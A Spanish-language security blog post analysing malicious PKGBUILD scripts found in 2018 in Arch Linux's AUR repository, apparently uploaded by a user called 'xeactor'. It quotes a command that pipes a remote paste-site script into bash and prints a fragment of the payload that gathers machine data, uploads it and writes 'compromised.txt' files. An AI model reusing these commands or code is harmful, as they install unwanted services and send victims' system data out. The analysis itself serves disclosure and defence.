jueves, 12 de julio de 2018

Malware hallado en el repositorio AUR de Arch Linux

Se han hallado varios scripts maliciosos en el repositorio AUR de la distribución Arch Linux.

Arch Linux es una distribución Linux para, en general, usuarios avanzados, sin añadidos (bloatware) y con un modelo de publicación basado en "rolling release" (publicación continua de las versiones más recientes de los paquetes). 

Debido a la celeridad en la producción y demanda de paquetes actualizados, la comunidad creó el sistema AUR (Arch User's Repository) para que fuesen los propios usuarios los que subieran los scripts PKGBUILD. Estos scripts permiten adaptar la compilación e instalación de cualquier código fuente a Arch.

Los tres scripts hallados, con contenido malicioso, son :

acrored 9.5.5-8
balz 1.20-3
minergate 8.1-2

Centrándonos en el script correspondiente a 'acroread', vemos el contenido cambiado por el usuario denominado 'xeactor':




La línea "curl -s https://ptpb.pw/~x|bash -&" descarga un shell script con curl y seguidamente lo ejecuta. En el momento de escribir estas líneas aun estaba disponible en el servidor, el contenido (por si acaso) era el siguiente:



Instala un servicio que ejecuta cada cierto tiempo el script instalado en '/usr/lib/xeactor/u.sh'. Dicho script, a su vez, es descargado del mismo servidor (también disponible cuando esto fue escrito) desde 'https://ptpb.pw/~u' y contenía el siguiente código:




Básicamente, recolecta información de la máquina "infectada" y la envía a pastebin. En efecto, la parte que se ve en rojo es su propia clave privada de pastebin. De hecho ya hay gente que la habría usado para mofarse del creador de este "malware":




Otros usuarios han comentado en Reddit que "xeactor" podría estar preparando esta infección para minar, debido al historial de ese apodo relacionado con dicha tecnología:



Y en efecto, aunque es una afirmación atrevida, tirando de caché de Google sí se observa dicha relación (reitero, esto no probaría que esa fuese su intención final, pero abre esa posibilidad):




Respecto al sitio donde cuelgan los scripts, https://ptpb.pw/, es un gestor de "pastes", del estilo del glorioso 'pastebin' y similares así como acortador de URLs, por lo que es posible que los scripts hayan sido, simplemente, subidos a esa plataforma sin relación alguna con el atacante. De hecho el método que habría usado es este en concreto:




Vamos a comprobarlo:






No sabremos las intenciones reales de tal usuario, porque el plan parecía de algún modo inacabado. No obstante, de haberlo llevado más lejos, nada le hubiera parado para instalar un minero u otro tipo de malware con mayor carga. Es más, incluso esta parte del código:



FULL_LOG="$(full_log)"
$uploader "$FULL_LOG"
for x in /root /home/*; do
 if [[ -w "$x/compromised.txt" ]]; then
  echo "$FULL_LOG" > "$x/compromised.txt"
 fi
done
exit 0


Deja un archivo con el contenido del log en los directorios /root y todos los /home de la máquina afectada, algo que resulta muy llamativo y evidente y que no dejaría pasar un usuario. Habitualmente, el malware dañino de cuida mucho de dejar esas pistas delante de la víctima, en este caso ni se ha encontrado una carga maliciosa ni oculta del todo sus operaciones. ¿Querría avisar 'xeactor' de la facilidad con la que se puede desatar una infección a los usuarios de Arch Linux? ¿O quizás eran sus intenciones más oscuras y esto solo era una prueba de concepto?





David García
@dgn1729

Más información: